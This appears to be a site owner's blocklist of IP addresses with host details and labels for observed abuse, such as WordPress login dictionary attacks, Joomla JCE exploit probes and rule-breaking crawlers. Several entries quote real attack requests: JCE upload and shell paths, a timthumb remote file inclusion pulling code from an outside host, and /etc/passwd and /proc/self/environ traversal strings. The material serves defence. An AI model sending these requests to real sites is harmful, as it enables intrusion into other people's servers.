85.241.204.112 Hostname: bl8-204-112.dsl.telepac.pt
Host: Portugal – Lisbon Pt Comunicacoes Sa
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
77.78.104.141 Hostname: 141.104.78.77.gransy.com
Host: Czech Republic – Prague Casablanca Int
Web server: 5 websites
LinksCrawler Bot – rule breaker
User agent: LinksCrawler 0.1beta
50.63.144.181 Hostname: ip-50-63-144-181.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 64 websites
Hacker – dictionary attack on wp-login with username admin
50.62.42.245 Hostname: ip-50-62-42-245.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 10 websites
Hacker – dictionary attack on wp-login with username admin
205.196.209.187 Hostname: ps175754.dreamhost.com
Host: United States – San Francisco New Dream Network Llc
Web server: 3 websites
Hacker – dictionary attack on wp-login with username admin
173.255.232.130 Hostname: ewrap27.xydo.com
Host: United States – Newark Linode
Malicious user agent: Java/1.6.0_35
Linode
81.209.177.189 Hostname: bardolino2.netestate.de
Host: Germany – Muenchen Netestate Gmbh
netEstate NE Crawler
User agent: netEstate NE Crawler (+http://www.website-datenbank.de/)
81.38.154.18 Hostname: 18.Red-81-38-154.dynamicIP.rima-tde.net
Host: Spain – Valladolid Telefonica De Espana Sau
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
114.130.54.109 Host: Bangladesh – Dhaka Bangladesh Computer Council
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/agger.php?rf
128.210.10.145 Hostname: web.ics.purdue.edu
Host: United States – West Lafayette Purdue University
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
54.226.162.166 Hostname: ec2-54-236-163-167.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
BufferBot
User agent: BufferBot
54.236.163.167 Hostname: ec2-54-236-163-167.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
grokkit-crawler
User agent: grokkit-crawler (pdsupport @purediscovery.com)
184.154.224.19 Hostname: ns1.siteground256.com
Host: United States – Chicago Singlehop Inc.
Web server: 925 websites
Hacker – dictionary attack on wp-login with username admin
62.146.2.234 Hostname: ipx62036.ipxserver.de
Host: Germany – Hamburg Seolytics Gmbh
Domnutch-Bot
User agent: Domnutch-Bot/Nutch-1.0 (Domnutch; http: //www.Nutch.de/)
207.154.104.160 Hostname: hyperion.impulse.net
Host: United States – Santa Barbara Impulse Internet Services
Web server: 24 websites
Hacker – dictionary attack on wp-login with username admin
184.168.74.130 Hostname: ip-184-168-74-130.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 39 websites
Hacker – dictionary attack on wp-login with username admin
208.109.236.182 Hostname: ip-208-109-236-182.ip.secureserver.net
Host: United States – New York City Godaddy.com Llc
Web server: 7 websites
Hacker – dictionary attack on wp-login with username admin
69.60.98.176 Host: United States – Miami Serverpronto
Web server: 9 websites
Hacker – dictionary attack on wp-login with username admin
75.98.175.74 Hostname: ssr3.supercp.com
Host: United States – Houston A2 Hosting Inc.
Web server: 1366 websites
Hacker – dictionary attack on wp-login with username admin
99.6.253.73 Hostname: 99-6-253-73.lightspeed.alhbca.sbcglobal.net
Host: United States – Alhambra AT&T Internet Services
Bot faking server and browser agent
Malicious user agent: PHP/5.2.10
2.51.208.6 Host: United Arab Emirates – ‘ajman Emirates Telecommunications Corporation.
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
77.222.61.154 Hostname: vh54.sweb.ru
Host: Russian Federation – Moscow Garant-park-telecom Ltd.
Web server: 1068 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/komos.php?rf
2.176.217.216 Host: Iran – Tehran Ip-pool For Adsl Users
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
93.175.222.2 Host: Ukraine – L’viv Pe Belokoputov Maksim Anatolievich
Web server: 19 websites
Hacker – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
212.33.246.9 Hostname: 212x33x246x9.static-business.perm.ertelecom.ru
Host: Russian Federation – Perm’ Cjsc Er-telecom Holding
Hacker – dictionary attack on wp-login with username admin
213.60.51.127 Hostname: 127.51.60.213.static.mundo-r.com
Host: Spain – A Coruna R Cable Y Telecomunicaciones Galicia S.a.
Hacker – dictionary attack on wp-login with username admin
177.99.172.126 Hostname: 177.99.172.126.static.gvt.net.br
Host: Brazil – Feira De Santana Ivi Tecnologia E Comunicacao Ltda
Hacker – dictionary attack on wp-login with username admin
190.31.221.122 Host: Argentina – Buenos Aires Apolo -gold-telecom-per
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
190.173.151.171 Host: Argentina – Buenos Aires Telefonica De Argentina
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
54.213.40.248 Hostname: ec2-54-213-40-248.us-west-2.compute.amazonaws.com
Host: United States – Portland Amazon.com Inc.
URLAppendBot
Corporate information spy bot
User agent: Mozilla/5.0 (compatible; URLAppendBot/1.0; +http: //www.profound.net/urlappendbot.html)
Misleading information – IP belongs to Amazon – no identification of user profound.net
77.252.131.11 Hostname: forcad.pl
Host: Poland – Poznan Budikom-komputerowe Wspomaganie Projektowania
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
190.202.253.41 Hostname: 190-202-253-41.dyn.dsl.cantv.net
Host: Venezuela – Caracas Cantv Servicios Venezuela
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
77.75.77.36 Hostname: fulltextrobot-77-75-77-36.seznam.cz
Host: Czech Republic – Prague Seznam.cz A.s.
SeznamBot
Scraper. Ignores robots.txt – rule breaker
User agent: SeznamBot/3.0 (+http: //fulltext.sblog.cz/)
129.2.12.99 Hostname: glam.umd.edu
Host: United States – College Park University Of Maryland
Malicious user agent: Python-urllib/2.6
82.154.208.8 Hostname: bl5-208-8.dsl.telepac.pt
Host: Portugal – Lisbon Pt Comunicacoes Sa
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
46.229.164.101 Host: Netherlands – Amsterdam Haldex Ltd
SemrushBot
Does not get robots.txt – rule breaker
2.180.162.22 Host: Iran – Mashhad Telecommunication Company Of Khorasan
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
195.206.120.29 Hostname: mail02-athesis.athesis.it
Host: Romania – Fullwebserver S.r.l.
Web server: 2 websites – liberoreporter.eu , liberoreporter.it
Hacker: Remote File Inclusion attempt / WordPress timthumb RFI exploit:
//DOMAIN/xmlrpc.php%22%20/%3E%20%3C!--%5Bif%20lt%20IE%209%5D%3E%3Cscript%20src=%22http://DOMAIN/wp-content/themes/d5-business-line/scripts/timthumb.php?src=http://wordpress.com.pinoypc.net/dlc.php
Multiple fake user agents:
1) Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)
2) Gigabot/3.0 (http: //www.gigablast.com/spider.html)
3) FreeWebMonitoring SiteChecker/0.1 (+http: //www.freewebmonitoring.com)
4) Mozilla/5.0 (compatible; Googlebot/2.1; +http: //www.google.com/bot.html)
5) Mozilla/5.0 (compatible;bingbot/2.0;+http: //www.bing.com/bingbot.htm)
217.79.181.76 Hostname: f076.fuchsia.fastwebserver.de
Host: Germany – Dusseldorf Fast It Colocation
Scraper – MJ12 bot
User agent: Mozilla/5.0 (compatible; MJ12bot/v1.4.4; http: //www.majestic12.co.uk/bot.php?+)
1.4.169.239 Hostname: node-8a7.pool-1-4.dynamic.totbb.net
Host: Thailand – Phuket Tot Public Company Limited
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
113.193.32.45 Host: India – Mumbai Tikona Digital Networks Pvt. Ltd.
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
190.164.81.49 Hostname: pc-49-81-164-190.cm.vtr.net
Host: Chile – Antofagasta Vtr Banda Ancha S.a.
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
194.28.172.249 Hostname: dedic.dc.besthosting.ua
Host: Ukraine – Vinnytsya On-line Llc
Web server: 56 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/go.php?rf
66.103.141.247 Hostname: gnsweb5.getnetsmart.com
Host: United States – Orlando Interpro Services
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
82.98.146.48 Hostname: d354.dinaserver.com
Host: Spain – Madrid Dinahosting S.l.
Web server: 14 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
199.188.74.110 Hostname: posiblehost.com
Host: United States – Dallas Enzu Inc
User agent: Go http package
190.229.37.165 Hostname: host165.190-229-37.telecom.net.ar
Host: Argentina – Buenos Aires Apolo -gold-telecom-per
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
122.174.99.30 Hostname: ABTS-TN-dynamic-030.99.174.122.airtelbroadband.in
Host: India – Chetput Abts Tamilnadu
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
194.153.113.35 Host: Germany – Kassel Ibm Deutschland Gmbh
oBot – Rule breaker, rubbish bot
User agent: Mozilla/5.0 (compatible; oBot/2.3.1; +http: //filterdb.iss.net/crawler/)
87.253.132.201 Hostname: 87-253-132-201.colo.transip.net
Host: Netherlands – Amsterdam Transip B.v.
Probably a scraper bot as it only gets RSS feeds
User agent: Go 1.1 package http
91.194.91.199 Hostname: m5008.contabo.net
Host: Germany – Muenchen Contabo Gmbh
Web server: 580 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/config.inc.php?rf
212.191.65.1 Hostname: xchg.math.uni.lodz.pl
Host: Poland – Lodz Technical University Of Lodz Computer Centre
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/config.inc.php?rf
107.160.158.82 Host: United States – Los Angeles Psychz Networks
Bad host: Psychz Networks
Suspicious activity – scanning for non-existent files
/plus/e7xue.php (PDF download app)
This looks like a code injection attempt
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=
205.186.139.18 Hostname: mylastroof.com
Host: United States – Culver City Media Temple Inc.
Web server: 65 websites
Hacker looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/m3ksi.php?rf
82.75.112.208 Hostname: 524B70D0.cm-4-4b.dynamic.ziggo.nl
Host: Netherlands – Groningen Ziggo Consumers
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
151.244.115.95 Hostname: 151-244-115-95.rasana.net
Host: Iran – Tehran Aria Shatel Company Ltd
Hacker looking for admin exploit
/administrator/index.php
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
41.143.248.234 Host: Morocco – Tangier Ip Adsl Maroctelecom
Hacker scanning for exploits
176.123.31.5 Host: Moldova – Chisinau Cloudata Srl
Hacker – Dictionary attack on WordPress username “admin”
199.190.45.201 Host: United States – Los Angeles Ucweb
ASN: CNNIC-CHINACACHE-AP Beijing Blue I.T Technologies Co.,Ltd
OrgName: ChinaCache North America, Inc
Bad user agent: UCWEB/2.0 (Java; U; MIDP-2.0; en-US; ) U2/1.0.0 UCBrowser/8.9.0.251 U2/1.0.0 Mobile UNTRUSTED/1.0
69.36.94.214 Host: United States – Simi Valley Siteserver Hosting Inc.
Hacker looking for OpenFlashChart exploits
/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=lobex21.php
88.116.181.86 Host: Austria – Vienna Swoboda Autohandel
Looking for admin exploits
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
195.37.227.84 Hostname: hal9000v.fh-bielefeld.de
Host: Germany – Berlin Fachhochschule Bielefeld
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
182.52.169.153 Hostname: node-xi1.pool-182-52.dynamic.totbb.net
Host: Thailand – Bangkok Tot Public Company Limited
Looking for admin exploits
Malicious user agent: Mozilla/3.0 (compatible; Indy Library)
85.214.88.82 Hostname: nousol.com
Host: Germany – Berlin Strato Ag
Web server: 1 website – nousol.com
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
87.253.132.202 Hostname: 87-253-132-202.colo.transip.net
Host: Netherlands – Amsterdam Transip B.v.
Probably a scraper bot as it only gets RSS feeds
User agent: Go 1.1 package http
82.224.158.239 Host: France – Colomiers Proxad/free Sas
Malicious user agent: Java/1.6.0_25
207.182.143.242 Hostname: f2.8f.b6.static.xlhost.com
Host: United States – Columbus Xlhost.com Inc
Rubbish bot:
niki-bot
91.197.15.34 Hostname: ip-91-197-15-34.gadu-gadu.pl
Host: Poland – Warsaw Gg Network S.a.
Rubbish bots / rule breaker: GG PeekBot
User agent: AboutUsBot/Harpy (Website Analysis; http: //www.aboutus.org/Aboutus:Bot; help @ aboutus.org)
54.208.201.249 Hostname: ec2-54-208-201-249.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Spy bot: AboutUsBot/Harpy
User agent: GG PeekBot 2.0 ( http: //gg.pl/ http: //info.gadu-gadu.pl/praca )
151.236.36.17 Hostname: 151-236-36-17.static.as29550.net
Host: United Kingdom – Maidenhead Simply Transit Ltd
Web server: 22 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
81.22.244.17 Hostname: srv-e17.esp.mediateam.fi
Host: Finland – Espoo Mediam Oy
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/NerO.php?rf
217.113.158.226 Hostname: zs2-226.man.pulawy.pl
Host: Poland – Pulawy Institute Of Soil Science And Plant Cultivation
Hacker looking for Joomla JCE exploit:
Known hacker bot user agent:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/dante.php?rf
202.5.192.3 Hostname: hosting.erdemnet.mn
Host: Mongolia – Ulaanbaatar Erdemnet Isp Center
Web server: 3 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
91.109.16.80 Hostname: hosting3.dashost.com
Host: Germany – Frankfurt Am Main Leaseweb Germany Gmbh
Web server: 87 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
193.25.166.81 Host: Poland – Katowice Expro Sp. Z O.o.
Web server: 259 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
209.217.76.227 Host: Canada – Ottawa Magma Communications Ltd
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
85.100.59.106 Hostname: 85.100.59.106.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Dictionary attack with username admin
82.224.158.239 Hostname: min31-2-82-224-158-239.fbx.proxad.net
Host: France – Colomiers Proxad/free Sas
Malicious user agent: Java/1.6.0_25
93.115.87.40 Hostname: lh18836.voxility.net
Host: Romania – Balotesti Voxility Srl
Web server: 1 website – tomsshoesaleoutlet.com
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) Mozilla/5.0 (Windows; U; Windows NT 5.1;en-US;rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Examples: 1) //images/stories/myblack.php
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
3) //images/stories/zoneh.php
67.212.165.162 Hostname: server.tribalhost.org
Host: United States – Chicago Singlehop Inc.
Web server: 4 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Examples: 1) /images/stories/dante.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
202.143.147.228 Host: Thailand – Bangkok Static Ip For Schools And Offices Under Administrative Of Ministry Of Education
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
151.237.177.88 Hostname: ptr88.newlooksdeal.com
Host: Sweden – Stockholm Deepak Mehta Fie
Web server: 1 website – cheapmichaelkorszone.net
Spammer / spam bot
77.75.73.36 Hostname: fulltextrobot-77-75-73-36.seznam.cz
Host: Czech Republic – Prague Seznam.cz A.s.
Rule breaker bot / scraper
User agent: SeznamBot/3.0 (+http: //fulltext.sblog.cz/)
65.36.241.79 Hostname: pm79.internetseer.com
Host: United States – Newark Internetseer.com Corp.
Rule breaker bot
User agent: InternetSeer.com
207.182.143.114 Hostname: 72.8f.b6.static.xlhost.com
Host: United States – Columbus Xlhost.com Inc
niki-bot
46.37.14.4 Hostname: host4-14-37-46.serverdedicati.aruba.it
Host: Italy – Arezzo Aruba S.p.a.
Web server: 10 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
78.4.254.173 Hostname: isp1ns2.noitel.it
Host: Italy – Roma Bt Italia S.p.a.
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)
Examples: 1) /images/stories/3xp.php
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
81.2.210.3 Hostname: future.vesim.cz
Host: Czech Republic – Prague Internet Cz A.s.
Web server: 112 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1
Examples: 1) /images/stories/komo.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
5.9.18.110 Hostname: ns5.tomas.uz
Host: Germany – Nuremberg Hetzner Online Ag
Web server: 180 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Examples: 1) //images/stories/morocanz.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
211.129.81.174 Hostname: p21174-ipbffx02hodogaya.kanagawa.ocn.ne.jp
Host: Japan – Yokohama Open Computer Network
Runs several rule breaker bots:
1) siclab (cboc-test@lab.ntt.co.jp)
2) pflab (co2h2onacl@gmail.com)
3) ichiro/4.0 (http: //help.goo.ne.jp/door/crawler.html)
4) DoCoMo/2.0 P901i(c100;TB;W24H11) (compatible; ichiro/mobile goo; +http: //help.goo.ne.jp/door/crawler.html)
Does not read robots.txt
212.172.221.19 Hostname: psa2.webhoster.ag
Host: Germany – Quedlinburg Webhoster.de Ag
Web server: 1 website – v-server.de
Hacker: Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/d5-business-line/lib/scripts/timthumb.php?src=http: //wordpress.com.pinoypc.net/dlc.php
Multiple fake user agents:
1) Mozilla/5.0 (compatible;Baiduspider/2.0;+http: //www.baidu.com/search/spider.html)
2) Gigabot/3.0 (http: //www.gigablast.com/spider.html)
3) FreeWebMonitoring SiteChecker/0.1 (+http: //www.freewebmonitoring.com)
4) Mozilla/5.0 (compatible; Googlebot/2.1; +http: //www.google.com/bot.html)
5) Mozilla/5.0 (compatible;bingbot/2.0;+http: //www.bing.com/bingbot.htm)
94.23.40.154 Hostname: ns369061.ovh.net
Host: France – Clermont-ferrand Ovh Systems
Web server: 15 websites
Hacker looking for multiple file inclusion exploits:
Examples: (too many to list all)
1) /bcoos/modules/news/?xoopsOption[pagetype]=../../../../../../../../etc/passwd%00
2) /modules/fax/index.php?module=../../../../../../etc/passwd%00
3) /data/compatible.php?module_name=../../../../../../../../etc/passwd%00
69.84.207.246 Hostname: security.lightspeedsystems.com
Host: United States – Bakersfield Lightspeed Technologies
LightspeedSystems bot
Rule breaker – ignores or doesn’t get robots.txt
User agents:
1) LSSRocketCrawler/1.0 LightspeedSystems
2) Mozilla/4.0 (compatible; MSIE 7.0;Windows NT 5.1;.NET CLR 1.1.4322;.NET CLR 2.0.50727;.NET CLR 3.0.04506.30) Lightspeedsystems
77.244.185.135 Hostname: web2.viamatica.it
Host: Italy – Treviolo Planetel Srl
Web server: 7 websites
Trying to access site admin
78.138.120.199 Hostname: reserve.alsoisp.net
Host: Germany – Duisburg Mantwill Edv
Web server: 1481 websites
Hacker looking for multiple file inclusion exploits:
/modules/groupadm/index.php?module=../../../../../../etc/passwd%00/modules/groupadm/index.php?module=../../../../../../etc/passwd%00
/gwebmail/?module=../../../../etc/passwd%00
/components/je-media-player.html?view=../../../../../../../../../../etc/passwd%00
/KikChat/private.php?name=../../../../../../../../../../etc/passwd%00
85.114.137.97 Hostname: i097.indigo.fastwebserver.de
Host: Germany – Dusseldorf Fast It Colocation
Web server: 10 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) /images/stories/food.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
194.201.253.2 Hostname: makao.kenyaweb.com
Host: Kenya – Nairobi Form-net Africa Kenya
Web server: 166 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples: 1) //images/stories/explore.gif
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
67.208.183.235 Hostname: 67.208.183.235.nyc.electricfiber.net
Host: United States – Boston Sidera Networks Llc
Banned user agent:
Nuance/Tegic Linguistics Team
80.78.243.24 Host: Russian Federation – Moscow Agava Ltd.
Web server: 8 websites
Hacker attempting known SiteGo cross site scripting / local file inclusion exploit
//site-go/admin/extra/backup/index.php?idb=../../../../../../../../../../../../../../../../../../../../../..
/../../../../../..//proc/self/environ%0000
152.92.241.5 Host: Brazil – Rio De Janeiro Uerj – Universidade Do Estado Do Rio De Janeiro
WordPress admin login attack
71.5.110.140 Host: United States – Anoka Kettle River Consulting
Web server: 2 websites – mtgfinder.com , revealurl.net
Banned user agent:
Apache-HttpClient/4.2.1 (java 1.5)
97.74.112.47 Hostname: ip-97-74-112-47.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 29 websites
WordPress admin login attack
50.63.130.155 Hostname: ip-50-63-130-155.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 31 websites
WordPress admin login attack
41.215.236.23 Hostname: 23.236.215.41.reverse.rsawebcloud.com
Host: South Africa – Claremont Network Resources – Datacenter1&
Web server: 6 websites
WordPress admin login attack
68.64.155.162 Hostname: h152.cpanellogin.net
Host: United States – Glendale Cpanellogin.net
Web server: 348 websites
WordPress admin login attack
69.64.34.185 Hostname: eagle172.server4you.net
Host: United States – Saint Louis Hosting Solutions International Inc.
Web server: 46 websites
WordPress admin login attack
85.214.141.105 Hostname: h1998317.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server: 7 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) BOT/0.1 (BOT for JCE)
Examples: 1) //images/stories/racrew.php?rf
2) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
141.8.196.23 Hostname: mbusiki.from.sh
Host: Russian Federation – Saint Petersburg Sprinthost.ru Llc
Web server: 25 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
1) Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
Examples: 1) /content//images/stories/3xp.php
95.211.130.117 Hostname: mail.ilpolipopiero.it
Host: Netherlands – Amsterdam Leaseweb B.v.
Web server: 29 websites
Hacker looking for Joomla JCE exploit:
Known hacker bot user agents:
